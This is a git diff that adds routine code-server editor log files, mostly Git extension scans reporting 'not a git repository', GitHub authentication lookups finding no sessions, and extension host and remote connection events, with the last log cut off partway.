git rev-parse --show-toplevel [2ms] +2026-01-29 00:03:56.260 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 00:10:09.064 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 00:10:09.064 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 00:10:09.501 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 00:10:09.501 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 00:10:11.019 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 00:10:11.019 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 00:10:12.064 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 00:10:12.064 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 00:10:26.929 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 00:10:26.929 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 00:15:52.073 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 00:15:52.073 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 00:16:35.553 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 00:16:35.553 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 00:19:05.977 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 00:19:05.977 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). diff --git a/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost8/vscode.github-authentication/GitHub Authentication.log b/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost8/vscode.github-authentication/GitHub Authentication.log new file mode 100755 index 0000000..3b420b9 --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost8/vscode.github-authentication/GitHub Authentication.log @@ -0,0 +1,33 @@ +2026-01-28 19:56:58.725 [info] Reading sessions from keychain... +2026-01-28 19:56:58.725 [info] Getting sessions for all scopes... +2026-01-28 19:56:58.725 [info] Got 0 sessions for ... +2026-01-28 19:56:58.725 [info] Getting sessions for all scopes... +2026-01-28 19:56:58.725 [info] Got 0 sessions for ... +2026-01-28 19:56:58.725 [info] Getting sessions for all scopes... +2026-01-28 19:56:58.725 [info] Got 0 sessions for ... +2026-01-28 19:56:58.725 [info] Getting sessions for all scopes... +2026-01-28 19:56:58.725 [info] Got 0 sessions for ... +2026-01-28 19:56:58.725 [info] Getting sessions for all scopes... +2026-01-28 19:56:58.725 [info] Got 0 sessions for ... +2026-01-28 19:56:58.725 [info] Getting sessions for all scopes... +2026-01-28 19:56:58.725 [info] Got 0 sessions for ... +2026-01-28 19:56:58.725 [info] Getting sessions for all scopes... +2026-01-28 19:56:58.725 [info] Got 0 sessions for ... +2026-01-28 19:56:58.725 [info] Getting sessions for all scopes... +2026-01-28 19:56:58.725 [info] Got 0 sessions for ... +2026-01-28 19:56:58.725 [info] Getting sessions for all scopes... +2026-01-28 19:56:58.725 [info] Got 0 sessions for ... +2026-01-28 19:56:58.735 [info] Getting sessions for all scopes... +2026-01-28 19:56:58.735 [info] Got 0 sessions for ... +2026-01-28 19:56:58.759 [info] Getting sessions for all scopes... +2026-01-28 19:56:58.759 [info] Got 0 sessions for ... +2026-01-28 19:56:58.759 [info] Getting sessions for all scopes... +2026-01-28 19:56:58.759 [info] Got 0 sessions for ... +2026-01-28 19:56:58.759 [info] Getting sessions for all scopes... +2026-01-28 19:56:58.759 [info] Got 0 sessions for ... +2026-01-28 19:56:58.759 [info] Getting sessions for all scopes... +2026-01-28 19:56:58.759 [info] Got 0 sessions for ... +2026-01-28 19:56:58.759 [info] Getting sessions for all scopes... +2026-01-28 19:56:58.759 [info] Got 0 sessions for ... +2026-01-28 19:57:00.258 [info] Getting sessions for all scopes... +2026-01-28 19:57:00.258 [info] Got 0 sessions for ... diff --git a/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost8/vscode.github/GitHub.log b/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost8/vscode.github/GitHub.log new file mode 100755 index 0000000..c378208 --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost8/vscode.github/GitHub.log @@ -0,0 +1 @@ +2026-01-28 19:56:59.078 [info] Log level: Info diff --git a/.vscode_config/.local/share/code-server/logs/20260126T174543/ptyhost.log b/.vscode_config/.local/share/code-server/logs/20260126T174543/ptyhost.log new file mode 100755 index 0000000..e409269 --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260126T174543/ptyhost.log @@ -0,0 +1,24 @@ +2026-01-26 20:26:24.078 [info] Expanding terminal instance, old id 70d739db-1 -> new id undefined +2026-01-26 20:26:28.340 [warning] Persistent process "1": Process had no disconnect runners but was an orphan +2026-01-26 20:26:28.340 [info] Persistent process reconnection "1" +2026-01-26 20:26:28.362 [info] Persistent process "1": Replaying 47 chars and 1 size events +2026-01-26 22:43:07.502 [info] Expanding terminal instance, old id 70d739db-1 -> new id undefined +2026-01-26 22:43:07.920 [warning] Persistent process "1": Process had no disconnect runners but was an orphan +2026-01-26 22:43:07.920 [info] Persistent process reconnection "1" +2026-01-26 22:43:07.959 [info] Persistent process "1": Replaying 47 chars and 1 size events +2026-01-27 18:12:59.800 [info] Expanding terminal instance, old id 70d739db-1 -> new id undefined +2026-01-27 18:13:00.147 [warning] Persistent process "1": Process had no disconnect runners but was an orphan +2026-01-27 18:13:00.147 [info] Persistent process reconnection "1" +2026-01-27 18:13:00.159 [info] Persistent process "1": Replaying 47 chars and 1 size events +2026-01-27 22:09:47.970 [info] Expanding terminal instance, old id 70d739db-1 -> new id undefined +2026-01-27 22:09:48.386 [warning] Persistent process "1": Process had no disconnect runners but was an orphan +2026-01-27 22:09:48.386 [info] Persistent process reconnection "1" +2026-01-27 22:09:48.392 [info] Persistent process "1": Replaying 47 chars and 1 size events +2026-01-28 07:50:41.381 [info] Expanding terminal instance, old id 3d7c237e-2 -> new id undefined +2026-01-28 07:50:46.199 [warning] Persistent process "2": Process had no disconnect runners but was an orphan +2026-01-28 07:50:46.199 [info] Persistent process reconnection "2" +2026-01-28 07:50:46.225 [info] Persistent process "2": Replaying 4884 chars and 1 size events +2026-01-28 19:56:58.729 [info] Expanding terminal instance, old id 70d739db-1 -> new id undefined +2026-01-28 19:56:59.125 [warning] Persistent process "1": Process had no disconnect runners but was an orphan +2026-01-28 19:56:59.125 [info] Persistent process reconnection "1" +2026-01-28 19:56:59.133 [info] Persistent process "1": Replaying 444 chars and 1 size events diff --git a/.vscode_config/.local/share/code-server/logs/20260126T174543/remoteTelemetry.log b/.vscode_config/.local/share/code-server/logs/20260126T174543/remoteTelemetry.log new file mode 100755 index 0000000..e69de29 diff --git a/.vscode_config/.local/share/code-server/logs/20260126T174543/remoteagent.log b/.vscode_config/.local/share/code-server/logs/20260126T174543/remoteagent.log new file mode 100755 index 0000000..3dda047 --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260126T174543/remoteagent.log @@ -0,0 +1,61 @@ +2026-01-26 17:45:43.335 [info] + + + + +2026-01-26 17:45:43.355 [info] Extension host agent started. +2026-01-26 17:45:43.406 [error] [192.168.100.179][56241436][ManagementConnection] Unknown reconnection token (never seen). +2026-01-26 19:32:03.406 [info] [192.168.100.179][488849cb][ManagementConnection] New connection established. +2026-01-26 19:32:04.189 [info] [192.168.100.179][5dcb9822][ExtensionHostConnection] New connection established. +2026-01-26 19:32:04.236 [info] [192.168.100.179][5dcb9822][ExtensionHostConnection] <483> Launched Extension Host Process. +2026-01-26 19:32:04.483 [info] [192.168.100.179][5dcb9822][ExtensionHostConnection] <483> [reconnection-grace-time] Extension host: read VSCODE_RECONNECTION_GRACE_TIME=10800000ms (10800s) + +2026-01-26 20:20:30.953 [info] [192.168.100.179][488849cb][ManagementConnection] The client has disconnected gracefully, so the connection will be disposed. +2026-01-26 20:20:31.077 [info] [192.168.100.179][5dcb9822][ExtensionHostConnection] <483> Extension Host Process exited with code: 0, signal: null. +2026-01-26 20:26:21.359 [info] [192.168.100.179][474810db][ManagementConnection] New connection established. +2026-01-26 20:26:22.370 [info] [192.168.100.179][48947a3b][ExtensionHostConnection] New connection established. +2026-01-26 20:26:22.374 [info] [192.168.100.179][48947a3b][ExtensionHostConnection] <9634> Launched Extension Host Process. +2026-01-26 20:26:22.625 [info] [192.168.100.179][48947a3b][ExtensionHostConnection] <9634> [reconnection-grace-time] Extension host: read VSCODE_RECONNECTION_GRACE_TIME=10800000ms (10800s) + +2026-01-26 22:43:04.474 [info] [192.168.100.179][474810db][ManagementConnection] The client has disconnected gracefully, so the connection will be disposed. +2026-01-26 22:43:04.595 [info] [192.168.100.179][48947a3b][ExtensionHostConnection] <9634> Extension Host Process exited with code: 0, signal: null. +2026-01-26 22:43:05.773 [info] [192.168.100.179][423316e4][ManagementConnection] New connection established. +2026-01-26 22:43:06.514 [info] [192.168.100.179][3b181445][ExtensionHostConnection] New connection established. +2026-01-26 22:43:06.519 [info] [192.168.100.179][3b181445][ExtensionHostConnection] <34224> Launched Extension Host Process. +2026-01-26 22:43:06.772 [info] [192.168.100.179][3b181445][ExtensionHostConnection] <34224> [reconnection-grace-time] Extension host: read VSCODE_RECONNECTION_GRACE_TIME=10800000ms (10800s) + +2026-01-27 00:13:42.176 [info] [192.168.100.179][423316e4][ManagementConnection] The client has disconnected gracefully, so the connection will be disposed. +2026-01-27 00:13:42.290 [info] [192.168.100.179][3b181445][ExtensionHostConnection] <34224> Extension Host Process exited with code: 0, signal: null. +2026-01-27 07:59:57.676 [info] [172.18.0.2][43ec8ed5][ManagementConnection] New connection established. +2026-01-27 07:59:58.548 [info] [172.18.0.2][d373c672][ExtensionHostConnection] New connection established. +2026-01-27 07:59:58.552 [info] [172.18.0.2][d373c672][ExtensionHostConnection] <50764> Launched Extension Host Process. +2026-01-27 07:59:58.802 [info] [172.18.0.2][d373c672][ExtensionHostConnection] <50764> [reconnection-grace-time] Extension host: read VSCODE_RECONNECTION_GRACE_TIME=10800000ms (10800s) + +2026-01-27 11:00:43.809 [info] [172.18.0.2][43ec8ed5][ManagementConnection] The client has disconnected gracefully, so the connection will be disposed. +2026-01-27 11:00:43.937 [info] [172.18.0.2][d373c672][ExtensionHostConnection] <50764> Extension Host Process exited with code: 0, signal: null. +2026-01-27 18:12:58.224 [info] [192.168.100.179][fc0468f4][ManagementConnection] New connection established. +2026-01-27 18:12:59.038 [info] [192.168.100.179][f73059e6][ExtensionHostConnection] New connection established. +2026-01-27 18:12:59.043 [info] [192.168.100.179][f73059e6][ExtensionHostConnection] <83902> Launched Extension Host Process. +2026-01-27 18:12:59.297 [info] [192.168.100.179][f73059e6][ExtensionHostConnection] <83902> [reconnection-grace-time] Extension host: read VSCODE_RECONNECTION_GRACE_TIME=10800000ms (10800s) + +2026-01-27 22:09:45.044 [info] [192.168.100.179][fc0468f4][ManagementConnection] The client has disconnected gracefully, so the connection will be disposed. +2026-01-27 22:09:45.157 [info] [192.168.100.179][f73059e6][ExtensionHostConnection] <83902> Extension Host Process exited with code: 0, signal: null. +2026-01-27 22:09:46.370 [info] [192.168.100.179][186a7769][ManagementConnection] New connection established. +2026-01-27 22:09:47.085 [info] [192.168.100.179][210f32e2][ExtensionHostConnection] New connection established. +2026-01-27 22:09:47.091 [info] [192.168.100.179][210f32e2][ExtensionHostConnection] <126234> Launched Extension Host Process. +2026-01-27 22:09:47.353 [info] [192.168.100.179][210f32e2][ExtensionHostConnection] <126234> [reconnection-grace-time] Extension host: read VSCODE_RECONNECTION_GRACE_TIME=10800000ms (10800s) + +2026-01-28 00:37:30.794 [info] [192.168.100.179][186a7769][ManagementConnection] The client has disconnected gracefully, so the connection will be disposed. +2026-01-28 00:37:30.980 [info] [192.168.100.179][210f32e2][ExtensionHostConnection] <126234> Extension Host Process exited with code: 0, signal: null. +2026-01-28 07:50:35.626 [info] [172.18.0.2][ceeb9d9b][ManagementConnection] New connection established. +2026-01-28 07:50:38.778 [info] [172.18.0.2][83456df2][ExtensionHostConnection] New connection established. +2026-01-28 07:50:38.785 [info] [172.18.0.2][83456df2][ExtensionHostConnection] <152964> Launched Extension Host Process. +2026-01-28 07:50:39.051 [info] [172.18.0.2][83456df2][ExtensionHostConnection] <152964> [reconnection-grace-time] Extension host: read VSCODE_RECONNECTION_GRACE_TIME=10800000ms (10800s) + +2026-01-28 13:31:24.824 [info] [172.18.0.2][ceeb9d9b][ManagementConnection] The client has disconnected gracefully, so the connection will be disposed. +2026-01-28 13:31:24.919 [info] [172.18.0.2][83456df2][ExtensionHostConnection] <152964> Extension Host Process exited with code: 0, signal: null. +2026-01-28 19:56:56.413 [info] [192.168.100.179][739ab47b][ManagementConnection] New connection established. +2026-01-28 19:56:57.455 [info] [192.168.100.179][131d88d2][ExtensionHostConnection] New connection established. +2026-01-28 19:56:57.471 [info] [192.168.100.179][131d88d2][ExtensionHostConnection] <218766> Launched Extension Host Process. +2026-01-28 19:56:57.805 [info] [192.168.100.179][131d88d2][ExtensionHostConnection] <218766> [reconnection-grace-time] Extension host: read VSCODE_RECONNECTION_GRACE_TIME=10800000ms (10800s) + diff --git a/.vscode_config/.local/share/code-server/logs/20260129T001948/exthost1/remoteExtHostTelemetry.log b/.vscode_config/.local/share/code-server/logs/20260129T001948/exthost1/remoteExtHostTelemetry.log new file mode 100755 index 0000000..e69de29 diff --git a/.vscode_config/.local/share/code-server/logs/20260129T001948/exthost1/remoteexthost.log b/.vscode_config/.local/share/code-server/logs/20260129T001948/exthost1/remoteexthost.log new file mode 100755 index 0000000..73d464e --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260129T001948/exthost1/remoteexthost.log @@ -0,0 +1,18 @@ +2026-01-29 00:21:15.103 [info] Extension host with pid 481 started +2026-01-29 00:21:15.104 [error] Error: EEXIST: file already exists, open '/root/.local/share/code-server/User/workspaceStorage/70d739db/vscode.lock' +2026-01-29 00:21:15.104 [info] Lock '/root/.local/share/code-server/User/workspaceStorage/70d739db/vscode.lock': Could not acquire lock, checking if the file is stale. +2026-01-29 00:21:15.105 [info] Lock '/root/.local/share/code-server/User/workspaceStorage/70d739db/vscode.lock': The pid 218766 appears to be gone. +2026-01-29 00:21:15.105 [info] Lock '/root/.local/share/code-server/User/workspaceStorage/70d739db/vscode.lock': Deleting a stale lock. +2026-01-29 00:21:15.116 [info] Lock '/root/.local/share/code-server/User/workspaceStorage/70d739db/vscode.lock': Lock acquired. +2026-01-29 00:21:15.194 [info] ExtensionService#_doActivateExtension vscode.github-authentication, startup: false, activationEvent: 'onAuthenticationRequest:github' +2026-01-29 00:21:15.195 [info] ExtensionService#_doActivateExtension vscode.emmet, startup: false, activationEvent: 'onLanguage' +2026-01-29 00:21:15.302 [info] ExtensionService#_doActivateExtension vscode.git-base, startup: true, activationEvent: '*', root cause: vscode.git +2026-01-29 00:21:15.337 [info] ExtensionService#_doActivateExtension vscode.git, startup: true, activationEvent: '*' +2026-01-29 00:21:15.337 [info] ExtensionService#_doActivateExtension vscode.github, startup: true, activationEvent: '*' +2026-01-29 00:21:15.483 [info] Eager extensions activated +2026-01-29 00:21:15.483 [info] ExtensionService#_doActivateExtension vscode.debug-auto-launch, startup: false, activationEvent: 'onStartupFinished' +2026-01-29 00:21:15.484 [info] ExtensionService#_doActivateExtension vscode.merge-conflict, startup: false, activationEvent: 'onStartupFinished' +2026-01-29 00:21:16.008 [info] ExtensionService#_doActivateExtension vscode.terminal-suggest, startup: false, activationEvent: 'onTerminalShellIntegration:*' +2026-01-29 01:16:26.992 [info] Extension host terminating: received terminate message from renderer +2026-01-29 01:16:26.993 [info] Lock '/root/.local/share/code-server/User/workspaceStorage/70d739db/vscode.lock': Marking the lockfile as scheduled to be released in 6000 ms. +2026-01-29 01:16:27.048 [info] Extension host with pid 481 exiting with code 0 diff --git a/.vscode_config/.local/share/code-server/logs/20260129T001948/exthost1/vscode.git/Git.log b/.vscode_config/.local/share/code-server/logs/20260129T001948/exthost1/vscode.git/Git.log new file mode 100755 index 0000000..e4b5011 --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260129T001948/exthost1/vscode.git/Git.log @@ -0,0 +1,80 @@ +2026-01-29 00:21:15.595 [info] [main] Log level: Info +2026-01-29 00:21:15.595 [info] [main] Validating found git in: "git" +2026-01-29 00:21:15.595 [info] [main] Using git "2.39.5" from "git" +2026-01-29 00:21:15.595 [info] [Model][doInitialScan] Initial repository scan started +2026-01-29 00:21:15.596 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 00:21:15.596 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 00:21:15.596 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 00:21:15.596 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 00:21:15.596 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 00:21:15.596 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 00:21:15.596 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 00:21:15.596 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 00:21:15.596 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 00:21:15.596 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 00:21:15.596 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 00:21:15.596 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 00:21:15.596 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 00:21:15.596 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 00:21:15.596 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 00:21:15.596 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 00:21:15.596 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 00:21:15.596 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 00:21:15.596 [info] > git rev-parse --show-toplevel [12ms] +2026-01-29 00:21:15.596 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 00:21:15.596 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 00:21:15.596 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 00:21:15.596 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 00:21:15.596 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 00:21:15.596 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 00:21:15.596 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 00:21:15.596 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 00:21:15.596 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 00:21:15.596 [info] [Model][doInitialScan] Initial repository scan completed - repositories (0), closed repositories (0), parent repositories (0), unsafe repositories (0) +2026-01-29 00:21:15.596 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 00:21:15.596 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 00:21:15.596 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 00:21:15.596 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 00:21:15.841 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 00:21:15.842 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 00:21:16.130 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 00:21:16.130 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 00:21:17.955 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 00:21:17.955 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 00:23:12.168 [info] > git rev-parse --show-toplevel [4ms] +2026-01-29 00:23:12.168 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 00:26:15.858 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 00:26:15.858 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 00:26:16.404 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 00:26:16.404 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 00:31:21.955 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 00:31:21.955 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 00:59:23.974 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 00:59:23.974 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 01:00:04.528 [info] > git rev-parse --show-toplevel [4ms] +2026-01-29 01:00:04.529 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). diff --git a/.vscode_config/.local/share/code-server/logs/20260129T001948/exthost1/vscode.github-authentication/GitHub Authentication.log b/.vscode_config/.local/share/code-server/logs/20260129T001948/exthost1/vscode.github-authentication/GitHub Authentication.log new file mode 100755 index 0000000..baa5c2e --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260129T001948/exthost1/vscode.github-authentication/GitHub Authentication.log @@ -0,0 +1,33 @@ +2026-01-29 00:21:15.411 [info] Reading sessions from keychain... +2026-01-29 00:21:15.411 [info] Getting sessions for all scopes... +2026-01-29 00:21:15.411 [info] Got 0 sessions for ... +2026-01-29 00:21:15.411 [info] Getting sessions for all scopes... +2026-01-29 00:21:15.411 [info] Got 0 sessions for ... +2026-01-29 00:21:15.411 [info] Getting sessions for all scopes... +2026-01-29 00:21:15.411 [info] Got 0 sessions for ... +2026-01-29 00:21:15.411 [info] Getting sessions for all scopes... +2026-01-29 00:21:15.411 [info] Got 0 sessions for ... +2026-01-29 00:21:15.411 [info] Getting sessions for all scopes... +2026-01-29 00:21:15.411 [info] Got 0 sessions for ... +2026-01-29 00:21:15.411 [info] Getting sessions for all scopes... +2026-01-29 00:21:15.411 [info] Got 0 sessions for ... +2026-01-29 00:21:15.411 [info] Getting sessions for all scopes... +2026-01-29 00:21:15.411 [info] Got 0 sessions for ... +2026-01-29 00:21:15.411 [info] Getting sessions for all scopes... +2026-01-29 00:21:15.411 [info] Got 0 sessions for ... +2026-01-29 00:21:15.411 [info] Getting sessions for all scopes... +2026-01-29 00:21:15.411 [info] Got 0 sessions for ... +2026-01-29 00:21:15.411 [info] Getting sessions for all scopes... +2026-01-29 00:21:15.411 [info] Got 0 sessions for ... +2026-01-29 00:21:15.435 [info] Getting sessions for all scopes... +2026-01-29 00:21:15.435 [info] Got 0 sessions for ... +2026-01-29 00:21:15.435 [info] Getting sessions for all scopes... +2026-01-29 00:21:15.435 [info] Got 0 sessions for ... +2026-01-29 00:21:15.435 [info] Getting sessions for all scopes... +2026-01-29 00:21:15.435 [info] Got 0 sessions for ... +2026-01-29 00:21:15.435 [info] Getting sessions for all scopes... +2026-01-29 00:21:15.435 [info] Got 0 sessions for ... +2026-01-29 00:21:15.435 [info] Getting sessions for all scopes... +2026-01-29 00:21:15.435 [info] Got 0 sessions for ... +2026-01-29 00:21:17.957 [info] Getting sessions for all scopes... +2026-01-29 00:21:17.957 [info] Got 0 sessions for ... diff --git a/.vscode_config/.local/share/code-server/logs/20260129T001948/exthost1/vscode.github/GitHub.log b/.vscode_config/.local/share/code-server/logs/20260129T001948/exthost1/vscode.github/GitHub.log new file mode 100755 index 0000000..16b2362 --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260129T001948/exthost1/vscode.github/GitHub.log @@ -0,0 +1 @@ +2026-01-29 00:21:15.710 [info] Log level: Info diff --git a/.vscode_config/.local/share/code-server/logs/20260129T001948/exthost2/remoteExtHostTelemetry.log b/.vscode_config/.local/share/code-server/logs/20260129T001948/exthost2/remoteExtHostTelemetry.log new file mode 100755 index 0000000..e69de29 diff --git a/.vscode_config/.local/share/code-server/logs/20260129T001948/exthost2/remoteexthost.log b/.vscode_config/.local/share/code-server/logs/20260129T001948/exthost2/remoteexthost.log new file mode 100755 index 0000000..c29f252 --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260129T001948/exthost2/remoteexthost.log @@ -0,0 +1,15 @@ +2026-01-29 07:45:23.821 [info] Extension host with pid 10823 started +2026-01-29 07:45:23.831 [info] Lock '/root/.local/share/code-server/User/workspaceStorage/3d7c237e/vscode.lock': Lock acquired. +2026-01-29 07:45:24.012 [info] ExtensionService#_doActivateExtension vscode.github-authentication, startup: false, activationEvent: 'onAuthenticationRequest:github' +2026-01-29 07:45:24.013 [info] ExtensionService#_doActivateExtension vscode.emmet, startup: false, activationEvent: 'onLanguage' +2026-01-29 07:45:24.215 [info] ExtensionService#_doActivateExtension vscode.git-base, startup: true, activationEvent: '*', root cause: vscode.git +2026-01-29 07:45:24.601 [info] ExtensionService#_doActivateExtension vscode.git, startup: true, activationEvent: '*' +2026-01-29 07:45:24.601 [info] ExtensionService#_doActivateExtension vscode.github, startup: true, activationEvent: '*' +2026-01-29 07:45:24.779 [info] Eager extensions activated +2026-01-29 07:45:24.779 [info] ExtensionService#_doActivateExtension vscode.debug-auto-launch, startup: false, activationEvent: 'onStartupFinished' +2026-01-29 07:45:24.779 [info] ExtensionService#_doActivateExtension vscode.merge-conflict, startup: false, activationEvent: 'onStartupFinished' +2026-01-29 07:45:28.650 [info] ExtensionService#_doActivateExtension vscode.terminal-suggest, startup: false, activationEvent: 'onTerminalShellIntegration:*' +2026-01-29 14:41:34.728 [info] ExtensionService#_doActivateExtension vscode.html-language-features, startup: false, activationEvent: 'onLanguage:html' +2026-01-29 16:27:52.970 [info] Extension host terminating: received terminate message from renderer +2026-01-29 16:27:52.971 [info] Lock '/root/.local/share/code-server/User/workspaceStorage/3d7c237e/vscode.lock': Marking the lockfile as scheduled to be released in 6000 ms. +2026-01-29 16:27:53.006 [info] Extension host with pid 10823 exiting with code 0 diff --git a/.vscode_config/.local/share/code-server/logs/20260129T001948/exthost2/vscode.git/Git.log b/.vscode_config/.local/share/code-server/logs/20260129T001948/exthost2/vscode.git/Git.log new file mode 100755 index 0000000..271f80b --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260129T001948/exthost2/vscode.git/Git.log @@ -0,0 +1,314 @@ +2026-01-29 07:45:24.816 [info] [main] Log level: Info +2026-01-29 07:45:24.816 [info] [main] Validating found git in: "git" +2026-01-29 07:45:24.816 [info] [main] Using git "2.39.5" from "git" +2026-01-29 07:45:24.816 [info] [Model][doInitialScan] Initial repository scan started +2026-01-29 07:45:24.816 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 07:45:24.816 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 07:45:24.816 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 07:45:24.816 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 07:45:24.817 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 07:45:24.817 [info] fatal: not a git repository (or any parent up to mount point /opt) 